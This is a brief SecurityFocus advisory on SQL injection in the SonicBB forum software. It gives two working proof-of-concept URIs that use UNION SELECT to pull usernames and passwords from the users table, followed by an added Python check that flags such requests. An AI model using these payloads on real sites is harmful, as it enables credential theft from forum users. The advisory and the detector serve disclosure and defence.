SonicBB Multiple SQL Injection Vulnerabilities

Attackers can use a browser to exploit these issues.

The following proof-of-concept URIs are available:

http://www.example.com/path/search.php?query=1&part=post`<> '' UNIoN SELECT `id`,`password`,1,1,1,1,`username` FROM `users` WHERE id=1/*&by=*/

http://www.example.com/path/viewforum.php?id=1' UNION SELECT `id`,`password`,1,1,1,1,1 FROM `users` WHERE id=1%23
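A defender-side check for the two request shapes above, as an added example that is not part of the original advisory or of SonicBB's code: it flags requests to search.php and viewforum.php whose `part` or `id` value has an unexpected shape or contains UNION SELECT. The allow-list patterns (numeric `id`, alphabetic `part`) and the name `check_uri` are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Expected value shape per (script, parameter). Assumption: `id` is a numeric
# forum id and `part` is a short keyword such as "post" (as seen on the page).
EXPECTED = {
    ("viewforum.php", "id"): re.compile(r"\d+"),
    ("search.php", "part"): re.compile(r"[A-Za-z_]+"),
}
# Case-insensitive so mixed-case variants such as "UNIoN" are still caught.
UNION_SELECT = re.compile(r"union\s+(all\s+)?select", re.IGNORECASE)

def check_uri(uri):
    """Return a list of (parameter, reason) findings for one request URI."""
    parts = urlsplit(uri)
    script = parts.path.rsplit("/", 1)[-1]
    findings = []
    # parse_qsl percent-decodes values, so %20 / %23 encodings are normalised.
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        rule = EXPECTED.get((script, name))
        if rule and not rule.fullmatch(value):
            findings.append((name, "unexpected shape"))
        if UNION_SELECT.search(value):
            findings.append((name, "UNION SELECT in value"))
    return findings

# Sample input: the two URIs listed in this advisory plus two constructed
# benign requests for comparison.
SAMPLES = [
    "http://www.example.com/path/search.php?query=1&part=post`<> '' UNIoN SELECT "
    "`id`,`password`,1,1,1,1,`username` FROM `users` WHERE id=1/*&by=*/",
    "http://www.example.com/path/viewforum.php?id=1' UNION SELECT "
    "`id`,`password`,1,1,1,1,1 FROM `users` WHERE id=1%23",
    "http://www.example.com/path/viewforum.php?id=7",        # constructed, benign
    "http://www.example.com/path/search.php?query=1&part=post",  # constructed, benign
]

if __name__ == "__main__":
    for uri in SAMPLES:
        print(check_uri(uri) or "clean", "<-", uri[:60])
```

The same shape checks belong in the application itself as input validation in front of parameterized queries; matching on log lines only detects attempts after the fact.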


 

Copyright 2010, SecurityFocus